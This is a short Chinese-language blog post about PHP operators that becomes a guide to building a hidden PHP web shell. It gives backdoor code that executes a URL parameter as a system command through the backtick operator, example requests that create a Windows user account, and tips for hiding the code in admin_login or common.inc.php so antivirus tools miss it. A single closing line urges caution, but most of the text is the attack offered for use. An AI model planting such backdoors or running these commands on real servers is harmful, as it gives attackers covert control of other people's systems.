转载不加作者名字的木JJ。

作者：猴子 博客:www.sbmonkey.com

php内大致有这么几种运算符。

按运算符号的功能分为：
一：算术运算符（+ - * / % ++ --）
二：字符串运算符 . 可以叫连接运算符号
三：赋值运算符 = += -= *= /= %= .=
四：比较运算符 > < >= <= == === <> != !==
五：逻辑运算符 &&或and ||或or ！或not
六：位运算符 & | ^ ~ << >> <<<
七：其他运算符 ? : `` @ => -> :: & $

 

而其中`` 在PHP中，我给它命名是系统运算符

因为包含在``内的字符串可以当做系统命令来执行，那么简单的。。

为了逃过杀软的查杀。。。。一种新型的PHP后门出来了。

<?php

$houzi = $_GET['monkey'];

echo `$houzi`;

?>

http://www.sbmonkey.com/1.php?monkey=net user monkey monkey /add

 

很明显的monkey变量的内容为net user monkey monkey /add。需要执行什么命令只需要monkey变量的值。

我们不必如此拘束。我们可以把他放在任意文件内

如：admin_login.asp

把这两句加入在中间增强隐蔽效果。

$houzi = $_GET['monkey'];

echo `$houzi`;

执行：

http://www.2cto.com /admin/admin_login.php?monkey=net user monkey monkey /add

 

以前有的人喜欢把后门放在common.inc.php内。这样，所有require 此文件的文件都可以当做后门

既然这样

那么我们完全可以在common.inc.php内使用

$GLOBALS['monkey']="net user monkey monkey /add"

来声明一个超级全局变量，然后在其他我们想插入的文件内插入echo `$houzi`;

这样做方便，免杀效果好

需要谨慎防御